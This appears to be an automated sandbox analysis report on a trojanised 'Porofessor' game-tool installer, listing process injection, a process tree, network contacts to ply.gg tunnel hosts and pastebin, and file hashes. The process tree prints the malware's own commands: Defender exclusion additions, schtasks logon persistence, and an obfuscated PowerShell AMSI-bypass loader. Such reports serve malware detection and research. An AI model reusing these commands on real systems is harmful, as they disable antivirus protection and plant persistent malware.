Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3564 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Program Files\WinRAR\Temp\Updater.exe
PID 3564 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Program Files\WinRAR\Temp\Updater.exe
PID 3564 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Program Files\WinRAR\Temp\Updater.exe
PID 3564 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3564 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 3720 N/A C:\Program Files\WinRAR\Temp\Updater.exe C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe
PID 2412 wrote to memory of 3720 N/A C:\Program Files\WinRAR\Temp\Updater.exe C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe
PID 3564 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Windows\System32\schtasks.exe
PID 3564 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Windows\System32\schtasks.exe
PID 3720 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe C:\Windows\System32\DxDiag.exe
PID 3720 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe C:\Windows\System32\DxDiag.exe
PID 3564 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Program Files\Node64.exe
PID 3564 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe C:\Program Files\Node64.exe
PID 2164 wrote to memory of 4888 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 4888 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2176 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 2176 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 1716 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node32.exe
PID 2164 wrote to memory of 1716 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node32.exe
PID 2164 wrote to memory of 1716 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node32.exe
PID 2164 wrote to memory of 2180 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2180 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 524 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 524 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 2004 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node2Json.exe
PID 2164 wrote to memory of 2004 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node2Json.exe
PID 2164 wrote to memory of 1740 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 1740 N/A C:\Program Files\Node64.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 240 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 240 N/A C:\Program Files\Node64.exe C:\Windows\System32\schtasks.exe
PID 2164 wrote to memory of 3140 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node3Json.exe
PID 2164 wrote to memory of 3140 N/A C:\Program Files\Node64.exe C:\Windows\System32\$Node3Json.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 908 wrote to memory of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 620 wrote to memory of 624 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 620 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 620 wrote to memory of 956 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 324 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 408 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 476 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 876 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 620 wrote to memory of 1028 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1108 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 676 wrote to memory of 2004 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\$Node2Json.exe
PID 620 wrote to memory of 1180 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1228 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 620 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 620 wrote to memory of 1260 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe"

C:\Program Files\WinRAR\Temp\Updater.exe

"C:\Program Files\WinRAR\Temp\Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Node64.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe

"C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe" Sel=1&Partner=3776&Extension=pibhbkkgefgheeglaeemkkfjlhidhcedalapdggh&Name=Porofessor.gg&UtmSource=porofessor-website&UtmMedium=download-button&UtmCampaign=download-button&Referer=porofessor.gg&Browser=chrome -partnerCustomizationLevel 0 --app-name="Porofessor" -exepath C:\Program Files\WinRAR\Temp\Updater.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "Node64" /SC ONLOGON /TR "C:\Program Files\Node64.exe" /RL HIGHEST

C:\Windows\System32\DxDiag.exe

"C:\Windows\System32\DxDiag.exe" /tC:\Users\Admin\AppData\Local\Overwolf\Temp\DxDiagOutput.txt

C:\Program Files\Node64.exe

"C:\Program Files\Node64.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST

C:\Windows\System32\$Node32.exe

"C:\Windows\System32\$Node32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:KioPFOPJLoXW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zvAMVMTMpGFjoQ,[Parameter(Position=1)][Type]$iZzKMyfdqE)$qjYVfFLBouE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'fle'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+'b'+'lic'+[Char](44)+'Se'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'An'+'s'+''+[Char](105)+'C'+[Char](108)+'ass'+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$qjYVfFLBouE.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'e'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$zvAMVMTMpGFjoQ).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$qjYVfFLBouE.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'lot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+'',$iZzKMyfdqE,$zvAMVMTMpGFjoQ).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $qjYVfFLBouE.CreateType();}$crbEeMsYAWAHN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+'e'+'th'+'o'+''+[Char](100)+''+[Char](115)+'');$bElbYgYIuskLxB=$crbEeMsYAWAHN.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+'Addre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iUnxxmedEtTGkCBaLbG=KioPFOPJLoXW @([String])([IntPtr]);$jOsynmMZfBQvcleROMzgZj=KioPFOPJLoXW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uwWrwpeyFqH=$crbEeMsYAWAHN.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+'n'+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$VZQqyTBYdtDZOK=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('L'+[Char](111)+''+[Char](97)+'dLib'+[Char](114)+''+[Char](97)+'ry'+'A'+'')));$lNDeybodhYSdonzDf=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('V'+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$tiBbssI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VZQqyTBYdtDZOK,$iUnxxmedEtTGkCBaLbG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$bWPYbujdWzPUnlTpG=$bElbYgYIuskLxB.Invoke($Null,@([Object]$tiBbssI,[Object]('Am'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$uOCXWOgTtl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,4,[ref]$uOCXWOgTtl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bWPYbujdWzPUnlTpG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,0x20,[ref]$uOCXWOgTtl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+[Char](111)+'d'+[Char](101)+''+[Char](115)+'ta'+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST

C:\Windows\System32\$Node2Json.exe

"C:\Windows\System32\$Node2Json.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST

C:\Windows\System32\$Node3Json.exe

"C:\Windows\System32\$Node3Json.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0b9d97cd-70d0-4750-963d-4863934568ef}

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 analyticsnew.overwolf.com udp
GB 54.230.10.62:80 analyticsnew.overwolf.com tcp
US 8.8.8.8:53 62.10.230.54.in-addr.arpa udp
GB 216.58.204.78:80 www.google-analytics.com tcp
GB 54.230.10.62:443 analyticsnew.overwolf.com tcp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 131.226.101.95.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 visit-kill.gl.at.ply.gg udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 every-bend.gl.at.ply.gg udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp

Files

memory/3564-0-0x00007FF9D6323000-0x00007FF9D6325000-memory.dmp

memory/3564-1-0x00000000008D0000-0x0000000000B52000-memory.dmp

C:\Program Files\WinRAR\Temp\Updater.exe

MD5 5f6bcb8ac6f38320eaa317a982c0a795
SHA1 116361e38b82776e2298d486faf11470c8d536c7
SHA256 7e67ad2b6f7ed0e1d2720f038169b2c625f16b15e15f78e549268b4b6794fd85
SHA512 b170d677dad9b9434450d55930070a7887f8e35cf397899ffa9aeb68e7b98c18ed7bf261dacbd9800ee4db98dc5ae8924253d12210b0bf404ea29bedbe28e195

